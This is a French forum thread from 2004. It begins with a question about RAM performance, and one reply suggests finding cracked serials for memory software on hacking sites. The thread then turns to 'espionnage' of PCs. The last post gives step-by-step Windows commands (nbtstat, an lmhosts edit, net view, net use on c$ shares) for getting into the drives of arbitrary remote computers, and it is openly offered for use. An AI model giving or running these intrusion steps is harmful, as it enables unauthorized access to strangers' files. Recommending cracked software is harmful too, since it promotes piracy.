PROBLEME DE MEMOIRE

Fermé
N!GH7M@RE - 22 avril 2004 à 22:52
N!GH7M@RE Messages postés 118 Date d'inscription mardi 23 mars 2004 Statut Membre Dernière intervention 22 juillet 2005 - 1 mai 2004 à 19:59
bonjour

je me suis apercu depuis peu de temps que ma barete de memoire serai moins puissante. En regardant dans les performances de fin de tache de xp home je suis a 390 mo alors ke avant j'etais a la moitie.
Mon pc aurai perdu de la vitesse pourtant je n'utilise ke des logiciels ki ne prenent rien msn et kazaa.
j'ai oublie de dire ke j'ai une barette de 256 mo.

merci..

2 réponses

bonjour
pour reavoire les encienne perfermance de ta rame tu peut toujoue utilisé des logiciels pour memoire comme memorie turbo ou memorie pro c'est simple tu télécharge la version promotionel et tu cherche son serial ou le crack dans les site du hacking et voila ton pc retrouve ca jeunes
j'enprofite pout te rappeler que j'avais poser une question sue l'espionnage et tu avais répondu. voila je te dit que ci t'a n'importe quelles information qui peut m'aider dans mes recherche je te serait reconnaissant de me les comunique. tu a mon email
meilleur salutation.
0
N!GH7M@RE Messages postés 118 Date d'inscription mardi 23 mars 2004 Statut Membre Dernière intervention 22 juillet 2005 10
1 mai 2004 à 18:22
Hello

merci de m'avoir aider pour mon pc, oui je peu peut etre t'aider pour l'espionnage de pc et je crois ke je t'avais demander pour kel type d'espionnage? repond je te repondrai
merci
0
hicham > N!GH7M@RE Messages postés 118 Date d'inscription mardi 23 mars 2004 Statut Membre Dernière intervention 22 juillet 2005
1 mai 2004 à 19:18
bonjour
vasy pour rentre a distence dans les dsck dur
merci
0
N!GH7M@RE Messages postés 118 Date d'inscription mardi 23 mars 2004 Statut Membre Dernière intervention 22 juillet 2005 10
1 mai 2004 à 19:59
Hello

1°/ Pour le réaliser il faut ouvrir une fenêtre MS-DOS si vous êtes sous windows; là, tapez la commande suivante qui vous permettra de trouver le nom de l'ordinateur à qui appartient cette adresse ip:
nbtstat -A ip_de_l'ordinateur_distant
Si vous avez pas compris, je donne un exemple: nbtstat -A 125.35.23.210
(l'adresse ip a été choisie au hasard et le A doit être en majuscule. Les espaces ont leur importance)
2°/ Ensuite vous allez voir apparaître différentes lignes de codes. Suivant si vous tombez sur une adresse étant attribuée ou pas, ces lignes diffèrent. Si un message d'erreur s'affiche (host not found), changez d'adresse, si des kyrielles de lignes s'affichent, c'est cool mais c'est pas suffisant. Il faut maintenant que la ligne suivante s'affiche parmi celles qui s'affichent.:
nom_de_l'ordinateur_distantUNIQUE Registered
Si vous n'avez toujours pas compris, je vais vous redonner un exemple: assassinUNIQUE Registered
(assassin est le nom de l'ordinateur distant. , XX est un nombre qui varie d'un ordinateur à l'autre.)
3°/ Bon maintenant que vous avez l'ip et le nom de l'ordinateur distant, vous allez ouvrir et modifier l'éditeur de Dos en tapant la commande suivante: edit lmhosts
4°/ Maintenant que vous êtes dans l'éditeur de Dos, vous allez taper les commandes suivantes:
ip_de_l'ordinateur nom_de_l'ordinateur #PRE
Si là encore vous avez rien pigé, je commence sérieusement à me demander si vous n'êtes pas un peu lamerz sur les bords. Mais comme j'ai une incroyable grandeur d'âme (sans modestie aucune), je vais encore une fois vous expliquer avec un exemple: 125.35.23.210 assassin #PRE
(même chose que précédemment et respectez les majuscules à l'endroit où j'en ai mis)
5°/ Enregistrez et quittez l'éditeur. De retour sur le Dos, tapez la commande suivante:
nbtstat -R
Vous devriez normalement obtenir: "Successful purge and preload of the NBT Remote Cache Name Table"
6°/ Tapez maintenant: net view *\\nom_de_l'ordinateur
C'est à ce moment la que tout se joue, si les ressources de cet ordinateur sont partagées, vous obtiendrez un inventaires des ressources partagées (c,d,e, ...) sinon il n'y aura rien dans cet inventaire.
7°/ Placez vous dans le répertoire de windows (je vous explique pas comment faire, si vous savez pas, prenez des cours au CNED).
8°/ A présent tapez: net use *\\nom_de_l'ordinateur\X
Les espaces ont de l'importance et vous remplacerez naturellement "nom_de_l'ordinateur" par "assassin" et le X par la lettre de la partition à laquelle vous désirez accéder. Si vous voulez accéder dans le répertoire où se trouve windows, tapez c$ à la place du X.
Voilà, vous êtes sur le disque c de l'ordinateur distant ayant comme nom assassin et comme adresse IP 125.35.23.110, n'y faites pas trop de conneries; souvenez vous, c'est la partie hacking, pas crashing. Si vous avez besoin de revenir sur cet ordinateur à l'avenir, faites une recherche (démarrer, rechercher, ordinateur) et tapez "assassin".
Si c'est la première fois que vous utilisez cet exploit, il faut créer un fichier lmhosts, pour cela, allez sous dos et tapez:
Edit, nouveau, ip_de_l'ordinateur nom_de_l'ordinateur_distant #PRE, sauvegarder, lmhosts, exit.
Le fichier lmhosts doit se trouver dans le répertoire windows.

tu peu ossi faire par ftp
0